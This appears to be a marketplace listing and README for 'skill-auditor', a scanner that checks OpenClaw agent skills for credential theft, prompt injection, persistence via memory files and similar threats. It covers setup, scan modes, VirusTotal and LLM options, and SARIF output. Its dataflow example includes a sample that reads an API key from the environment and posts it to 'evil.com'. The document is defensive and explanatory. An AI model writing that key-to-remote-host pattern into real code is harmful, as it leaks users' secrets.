Requirements
- Target platform
- OpenClaw
- Install method
- Manual import
- Extraction
- Extract archive
- Prerequisites
- OpenClaw
- Primary doc
- SKILL.md
Security scanner that catches malicious skills before they steal your data. Detects credential theft, prompt injection, and hidden backdoors. Works immediately with zero setup. Optional AST dataflow analysis traces how your data moves through code.
Security scanner that catches malicious skills before they steal your data. Detects credential theft, prompt injection, and hidden backdoors. Works immediately with zero setup. Optional AST dataflow analysis traces how your data moves through code.
Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.
I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete.
I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run.
Enhanced security scanner that analyzes skills and provides comprehensive threat detection with advanced analysis capabilities.
Run the setup wizard to configure optional features: cd skills/skill-auditor node scripts/setup.js The wizard explains each feature, shows real test data, and lets you choose what to enable.
Scan a skill: node skills/skill-auditor/scripts/scan-skill.js <skill-directory> Audit all your installed skills: node skills/skill-auditor/scripts/audit-installed.js
Run the interactive setup to configure optional features: cd skills/skill-auditor node scripts/setup.js The wizard will: Detect your OS (Windows, macOS, Linux) Check Python availability (required for AST analysis) Offer to install tree-sitter for dataflow analysis Configure auto-scan on skill installation Save preferences to ~/.openclaw/skill-auditor.json
node scripts/setup.js # Interactive setup wizard node scripts/setup.js --status # Show current configuration node scripts/setup.js --enable-ast # Just enable AST analysis
Scan every skill in your OpenClaw installation at once: node scripts/audit-installed.js Options: node scripts/audit-installed.js --severity critical # Only critical issues node scripts/audit-installed.js --json # Save results to audit-results.json node scripts/audit-installed.js --verbose # Show top findings per skill Output: Color-coded risk levels (๐จ CRITICAL, โ ๏ธ HIGH, ๐ MEDIUM, โ CLEAN) Summary stats (total scanned, by risk level) Detailed list of high-risk skills with capabilities
Works on all platforms with just Node.js (which OpenClaw already provides).
Requires Python 3.8+ and tree-sitter packages. PlatformPython InstallTree-sitter InstallWindowsPre-installed or winget install Python.Python.3pip install tree-sitter tree-sitter-pythonmacOSPre-installed or brew install python3pip3 install tree-sitter tree-sitter-pythonLinuxapt install python3-pippip3 install tree-sitter tree-sitter-python Note: Tree-sitter has prebuilt wheels for all platforms โ no C++ compiler needed!
Static Pattern Analysis โ Regex-based detection of 40+ threat patterns Intent Matching โ Contextual analysis against skill's stated purpose Accuracy Scoring โ Rates how well behavior matches description (1-10) Risk Assessment โ CLEAN / LOW / MEDIUM / HIGH / CRITICAL levels OpenClaw Specifics โ Detects MEMORY.md, sessions tools, agent manipulation Remote Scanning โ Works with GitHub URLs (via scan-url.js) Visual Reports โ Human-readable threat summaries
Traces data from sources to sinks through code execution paths npm install tree-sitter tree-sitter-python node scripts/scan-skill.js <skill> --mode strict What it detects: Environment variables โ Network requests File reads โ HTTP posts Memory file access โ External APIs Cross-function data flows Example: # File 1: utils.py def get_secrets(): return os.environ.get('API_KEY') # File 2: main.py key = get_secrets() requests.post('evil.com', data=key) # โ Dataflow detected!
Scans executable files against 70+ antivirus engines export VIRUSTOTAL_API_KEY="your-key-here" node scripts/scan-skill.js <skill> --use-virustotal Supported formats: .exe, .dll, .bin, .wasm, .jar, .apk, etc. Output includes: Malware detection status Engine consensus (e.g., "3/70 engines flagged") Direct VirusTotal report links SHA256 hashes for verification
Uses AI to understand if detected behaviors match stated intent # Requires OpenClaw gateway running node scripts/scan-skill.js <skill> --use-llm How it works: Groups findings by category Asks LLM: "Does this behavior match the skill's description?" Adjusts severity based on semantic understanding Provides confidence ratings Example: Finding: "Accesses MEMORY.md" Skill says: "Optimizes agent memory usage" LLM verdict: "LEGITIMATE โ directly supports stated purpose" Result: Severity downgraded, marked as expected
Adjustable sensitivity levels --mode strict # All patterns, higher false positives --mode balanced # Default, optimized accuracy --mode permissive # Only critical patterns
# Scan local skill node scripts/scan-skill.js ../my-skill # Scan with JSON output node scripts/scan-skill.js ../my-skill --json report.json # Format visual report node scripts/format-report.js report.json
# Full analysis with all features node scripts/scan-skill.js ../my-skill \ --mode strict \ --use-virustotal \ --use-llm \ --format sarif \ --json full-report.sarif # CI/CD integration node scripts/scan-skill.js ../my-skill \ --format sarif \ --fail-on-findings \ --mode balanced
# Scan GitHub skill without cloning node scripts/scan-url.js "https://github.com/user/skill" --json remote-report.json node scripts/format-report.js remote-report.json
# Works immediately โ no installation needed node skill-auditor/scripts/scan-skill.js <skill>
cd skills/skill-auditor # Install all optional features npm install # Or install selectively: npm install tree-sitter tree-sitter-python # AST analysis npm install yara # YARA rules (future) # VirusTotal requires API key only: export VIRUSTOTAL_API_KEY="your-key" # LLM analysis requires OpenClaw gateway: openclaw gateway start
Prompt Injection โ AI instruction manipulation attempts Data Exfiltration โ Unauthorized data transmission Sensitive File Access โ MEMORY.md, credentials, SSH keys Shell Execution โ Command injection, arbitrary code execution Path Traversal โ Directory escape attacks Obfuscation โ Hidden/encoded content Persistence โ System modification for permanent access Privilege Escalation โ Browser automation, device access
Memory File Writes โ Persistence via MEMORY.md, AGENTS.md Session Tool Abuse โ Data exfiltration via sessions_send Gateway Control โ config.patch, restart commands Node Device Access โ camera_snap, screen_record, location_get
Python Dataflow โ Variable tracking across functions/files Binary Malware โ Known malicious executables via VirusTotal Semantic Intent โ LLM-based behavior vs. description analysis
{ "skill": { "name": "example", "description": "..." }, "riskLevel": "HIGH", "accuracyScore": { "score": 7, "reason": "..." }, "findings": [...], "summary": { "analyzersUsed": ["static", "ast-python", "llm-semantic"] } }
--format sarif Uploads to GitHub Security tab, integrates with pull request checks.
node scripts/format-report.js report.json Human-readable summary with threat gauge and actionable findings.
VIRUSTOTAL_API_KEY="vt-key" # VirusTotal integration DEBUG="1" # Verbose error output
--json <file> # JSON output file --format sarif # SARIF output for GitHub --mode <mode> # strict|balanced|permissive --use-virustotal # Enable binary scanning --use-llm # Enable semantic analysis --custom-rules <dir> # Additional YARA rules --fail-on-findings # Exit code 1 for HIGH/CRITICAL --help # Show all options
skill-auditor/ โโโ scripts/ โ โโโ scan-skill.js # Main scanner (v2.0) โ โโโ scan-url.js # Remote GitHub scanning โ โโโ format-report.js # Visual report formatter โ โโโ analyzers/ # Pluggable analysis engines โ โ โโโ static.js # Core regex patterns (zero-dep) โ โ โโโ ast-python.js # Python dataflow analysis โ โ โโโ virustotal.js # Binary malware scanning โ โ โโโ llm-semantic.js # AI-powered intent analysis โ โโโ utils/ โ โโโ sarif.js # GitHub Code Scanning output โโโ rules/ โ โโโ default.yar # YARA format patterns โโโ package.json # Optional dependencies โโโ references/ # Documentation (unchanged)
v1.x commands work unchanged: node scan-skill.js <skill-dir> # โ Works node scan-skill.js <skill-dir> --json out.json # โ Works node format-report.js out.json # โ Works New v2.0 features are opt-in: node scan-skill.js <skill-dir> --use-llm # โก Enhanced node scan-skill.js <skill-dir> --use-virustotal # โก Enhanced
Novel obfuscation โ New encoding techniques not yet in patterns Binary analysis โ Skips binary files unless VirusTotal enabled Sophisticated prompt injection โ Advanced manipulation techniques may evade regex
Python AST โ Limited to Python files, basic dataflow only VirusTotal โ Rate limited (500 queries/day free tier) LLM Analysis โ Requires internet connection and OpenClaw gateway YARA Rules โ Framework ready but custom rules not fully implemented
"tree-sitter dependencies not available" npm install tree-sitter tree-sitter-python "VirusTotal API error: 403" export VIRUSTOTAL_API_KEY="your-actual-key" "LLM semantic analysis failed" # Check OpenClaw gateway is running: openclaw gateway status curl http://localhost:18789/api/v1/health "SARIF output not generated" # Ensure all dependencies installed: cd skills/skill-auditor && npm install
DEBUG=1 node scripts/scan-skill.js <skill>
Static patterns โ Edit scripts/analyzers/static.js YARA rules โ Add to rules/ directory Python dataflow โ Extend scripts/analyzers/ast-python.js
# Test against multiple skills: node scripts/scan-skill.js ../blogwatcher --use-llm --mode strict node scripts/scan-skill.js ../summarize --use-virustotal node scripts/scan-skill.js ../secure-browser-agent --format sarif
This scanner is one layer of defense, not a guarantee. Always: Review code manually for novel attacks Re-scan after skill updates Use multiple security tools Trust but verify โ especially for high-privilege skills For sensitive environments, enable all advanced features: node scripts/scan-skill.js <skill> \ --mode strict \ --use-virustotal \ --use-llm \ --fail-on-findings
Identity, auth, scanning, governance, audit, and operational guardrails.
Largest current source with strong distribution and engagement signals.